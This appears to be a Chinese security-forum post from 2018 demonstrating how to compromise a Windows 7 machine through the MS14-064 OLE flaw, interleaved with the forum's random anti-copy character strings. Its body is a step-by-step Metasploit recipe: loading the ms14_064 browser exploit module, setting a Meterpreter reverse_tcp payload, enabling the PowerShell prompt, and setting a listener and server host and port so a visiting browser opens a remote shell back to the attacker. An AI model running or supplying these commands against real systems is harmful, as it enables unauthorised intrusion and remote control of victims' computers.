找回密码
 立即注册
查看: 1892|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

9 m! ?. M- p/ u: H6 M. M$ g 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示' _% b/ P) _* F, r# v. p

% O# s: M; a6 D: _

/ u! X) L7 |3 R7 V1 f 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 4 T5 a& p* q- R0 E

e8 p8 B) o! o/ I1 x$ n9 s

5 F$ o1 }8 }! o% W: L( M 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp+ A! M( @# _& g! ?9 j4 E

# }- S. _! F+ l U8 q3 O+ v

, N7 H; Z3 h3 F+ b$ R& f             set AllowPowershellPrompt true% i {) C) _0 v* q" S3 i7 \

% ~3 z% R6 K) ~- }( V

+ U1 z2 |3 e9 e8 I7 D             Set LHOST 192.168.0.1096 `# K9 [: L1 Q0 i

- O# c c. r" m- W' g

4 b* \* D+ K8 S4 {5 w% S7 u; c             set SRVHOST 192.168.0.109$ ]% C3 J' Q1 z6 q! G

( b% K6 l! K; l8 P& g$ ?& u

6 v, }) s0 L: ^' N+ f             Set uripath share7 H2 h+ b6 M# g# ^8 I2 h2 M( b

3 R( ~1 I" t- }% |; j

3 S1 \. ^" O2 D, Y- h1 h. ?$ U             Set srvport 80 % c7 Y- O+ i* G) ~2 @% Z; X' I

- r' s/ ^$ u1 E) i2 F" r, x& h

0 ^- C1 u8 N" D8 R& Q8 ^% T  7 R) n9 l7 B! ?4 Q' V" i0 P% O

# F! Z3 ]+ Y5 m+ f; @& t9 `* `

. |) n8 |/ F* h& ^! }   ; u! t: x: Z A! V

4 S- I6 e% d& }$ j2 s0 W% t; @

; n5 ?1 H1 O- p9 n2 f* _- ^   " C" `7 p* F+ H5 I' Q; J8 M

, d S0 h- b) n9 e

9 l2 }9 o5 g0 f   8 \) z* o9 E; c& Y! [- A: w

5 Q! j* o4 ^8 F2 ~8 Y' w/ M1 `

: a" }$ h+ U- p4 R# P2 m  ) t& M8 \0 N' \; q6 l! U" `

0 n% _' W6 l' I7 u" U$ j

/ q" | c& q& l' }6 x9 \; S 下面我们来访问本地地址如图:0 P; g: Z" Y6 n6 Q* b7 \% k2 `

5 [. ?7 i& O( z, m4 k

7 m6 H% ?; F$ b t  # {, u: k* R3 K7 O' C, J* O0 d- N

7 _8 M8 X, `3 K' t3 d* ]5 c

M/ p6 [, I, C3 `! A& g' T* n  ( _/ _8 O" N3 L3 E$ m. M, x

( a) A: }5 K3 W

2 R u+ x4 x+ M' k6 v1 F/ O* ?' } + U$ J8 W" A! s: F; h: ^3 l

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表